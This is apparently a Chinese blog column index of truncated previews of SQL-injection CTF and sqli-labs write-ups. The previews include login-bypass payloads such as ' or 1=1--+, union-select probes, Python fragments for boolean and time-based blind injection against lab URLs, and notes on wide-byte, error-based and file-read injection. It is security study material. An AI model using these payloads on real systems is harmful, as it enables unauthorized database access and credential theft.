
sql注入
捞氘河水怪
已废弃
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
[WUSTCTF2020]颜值成绩查询 布尔盲注
[WUSTCTF2020]颜值成绩查询只有一个输入框,是sql注入题目尝试输入1,2,3可以发现是get方法提交的参数且是数字型故用hackbar/?stunum=1 or 1=2 %23student number not exists.刚刚还可以查到现在查不到了判断存在过滤尝试下发现是空格上盲注脚本import stringimport requestsselect=f"select/**/value/**/from/**/flag"ans=""for i in ran原创 2021-12-02 21:04:27 · 340 阅读 · 0 评论 -
[sql注入]宽字节注入&&约束攻击&&二次注入
宽字节字符集符号=====》二进制数ASCIILATIN1GBK 2byteUTF-8 1byte [00-7F] 2byte [C0-DF] [80-BF] 3byte [E0-EF] [80-BF] [80-BF] 4byte [F0-F7] [80-BF] [80-BF] [80-BF]如果首字节在C0-DF中单第二个字节不在80-BF中那么在utf-8中会把首字节丢弃产生原因:数据库原创 2021-11-14 11:09:39 · 1474 阅读 · 0 评论 -
[mysql][sql注入]读写文件
secure_file_priv 全局变量mysql> show variables like "%secure_file%" -> ;+------------------+-------+| Variable_name | Value |+------------------+-------+| secure_file_priv | NULL |+------------------+-------+1 row in set, 1 warning (0.00原创 2021-11-14 09:23:47 · 308 阅读 · 0 评论 -
[less17][sqli靶场] 对update语句的注入
与以往的登录界面不同这是个修改密码的php页面在对uname进行了各种闭合之后发现一直返回同一结果,延时也没用无能为力只能看看源码源码如下<?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);function check_input($value) { if(!empty($value)) { // tr原创 2021-11-13 20:04:09 · 339 阅读 · 0 评论 -
[sql注入]万能密码
uname=1&passwd=1 or 1=1--+uname=1&passwd=1' or 1=1--+uname=1&passwd=1" or 1=1--+uname=1&passwd=1') or 1=1--+uname=1&passwd=1") or 1=1--+作者:Hyafinthus链接:https://www.jianshu.com/p/b9ceed993ad4来源:简书著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出转载 2021-11-13 15:40:22 · 399 阅读 · 0 评论 -
[sql注入]时间盲注模板+sqli靶场less-9
less-9观察页面只有一个返回值You are in…即使值为错也没有返回因此采用时间盲注import requestsimport stringimport timeip="http://a86ecc66-5929-4b0d-b39c-842de53f0121.node4.buuoj.cn/Less-9/?id="command="database()"result=""for i in range(1,100): for j in string.ascii_letters:原创 2021-11-13 14:17:16 · 511 阅读 · 0 评论 -
[Less-8][sqli靶场]布尔盲注
Less-8打开发现只有两种回显you are in…和无回显正好对应布尔型盲注的两个状态首先判断注入类型(字符,数字)?id=1 and 1=2 返回了you are in 可是这个逻辑是错的 故而不是数字型尝试字符型?id=-1' or '1' ='2?id=1' and '1'='2判断为字符型payloadi代表爆破的当前位数j代表所有小写字母对这两进行遍历payload:?id=1' and ord(substr((sql),i,1))=ascii(j)原创 2021-11-13 10:23:23 · 601 阅读 · 0 评论 -
[极客大挑战 2019]BabySQL
[极客大挑战 2019]BabySQL打开发现传统的登录界面提示有过滤首先试试注释掉密码验证check.php?username=admin' %23&password=123456成功登录Hello admin!Your password is '55d94c431213ae807b9ed68f7f51acb8'试试万能密码check.php?username=admin' or 1=1 %23&password=123456报错You have an err原创 2021-11-13 09:54:39 · 441 阅读 · 0 评论 -
[极客大挑战 2019]LoveSQL
万能密码登录成功没有发现flag判断藏在数据库里check.php?username=1' or '1'='1&password=123456' or '1'='1登陆成功返回的密码7a2d6a8fd56b61a79bba61ee8f5ad02c直接开始联合注入check.php?username=1' union select 1,2,3%23&password=1check.php?username=1' union select 1,2,database()%23&原创 2021-11-12 22:10:13 · 671 阅读 · 1 评论 -
[sql盲注]盲注中的截取与比较函数方法大全
盲注的关键在于截取和比较截取#1:substr((),i,1) == substr(() from i for 1 )#0x+hex可以表示字符串#2:mid((),i,1)#3:right((),i) 返回右边第i位 同理reverse(left())#4:ascii()==ord()#5:trim eg:select trim(LEADING 'a' from 'abcd')=trim(LEADING 'b' from 'abcd')比较#<>=#Li原创 2021-11-12 20:03:39 · 608 阅读 · 0 评论 -
[ctf sql]绕过对sql语句过滤
过滤过滤 单引号逃逸出攻击语句php语句sql=select * form users where username='$POST["name"]' and password ='$_POST["pwd"]';如果能同时传值给name和pwd那么name=admin\pwd= and 1=1 #拼接后sql= select * form users where username='admin\' and password ='and 1=1 #';成功令后一个pwd的引号与name的引原创 2021-11-12 17:36:50 · 742 阅读 · 0 评论 -
基于报错的布尔盲注
基于报错的布尔盲注条件:只输出对错但不输出报错内容函数exp与cotexp(int) 自然对数的次方cot(int) 余切值select if((sql语句),exp(99999999),0)根据是否报错来确定(sql语句)表达式的对错通过一位一位判断来爆出结果属于布尔盲注范畴过滤过滤 单引号逃逸出攻击语句php语句sql=select * form users where username='$POST["name"]' and password ='$_POST["pwd原创 2021-11-12 17:35:20 · 662 阅读 · 0 评论 -
[ctf web]sql报错注入
报错注入一: exp,pow溢出报错exp(int) 返回e的x次方exp(~(select * from (select user())a))~:取反运算符将字符串处理后变为大整数,报错exp(710):报错exp(709):不报错绕过if,case的过滤进行基于报错的布尔盲注。pow(int,int)返回x的y次方数值过大报错pow(1+(sql表达式),99999999999999)若sql语句为假则不报错为真则报错二:XML和Xpath基础XML:标记原创 2021-11-12 16:51:31 · 396 阅读 · 0 评论 -
基于post方法的sql布尔型盲注模板
#记录下bugku中的一道布尔盲注题目“sql注入”import requests as req#Post 类型的bool盲注#过滤了','没法用mid,substr,left 截取 试试substr(()from()for())url="http://114.67.246.176:17306/"#bugku项目的url地址s=req.session()#创建session对象select="database()"select2="select group_concat(table_na原创 2021-11-05 16:40:04 · 322 阅读 · 0 评论